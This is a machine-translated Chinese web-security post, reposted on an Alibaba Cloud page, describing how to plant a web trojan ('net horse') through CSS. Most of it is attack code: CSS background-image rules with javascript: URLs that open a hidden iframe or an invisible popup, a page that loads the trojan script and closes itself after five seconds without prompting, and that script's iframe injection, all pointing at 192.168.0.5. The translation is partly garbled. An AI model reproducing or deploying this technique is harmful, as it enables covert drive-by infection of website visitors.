Really can use, but also a little effect of the CSS hanging Horse Code Method _ security-related

Source: Internet
Author: User
Popular on the Internet:
Body
{
Background-image:url (' Javascript:document.write ("<iframe src=http://192.168.0.5/test.htm width=0 height=0> </iframe> ")")
}
This method causes the home page to be abnormal. Returns a blank.
Use the window.
Body
{
Background-image:url (' Javascript:open (' http://192.168.0.5/test.htm ') ')
}
A box pops up. Ugly easy to be found.
To improve:

Body
{
Background-image:url (Javascript:open (' http://192.168.0.5/test.htm ', ' newwindow ', ' height=0, width=0, top=1000, left =0, Toolbar=no, Menubar=no, Scrollbars=no, Resizable=no,location=no, Status=no ')
}
Test.htm inside the code, a.js for your net horse, pop up an invisible window, and after 5 seconds automatically off without prompting:
<script src= "A.js" ></script>
<script>
Window.opener=null;settimeout ("Window.close ();", 5000);
</script>
A.js content:
document.write (' <iframe src= ' http://192.168.0.5/calc.htm "></iframe>");
Please advise.
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.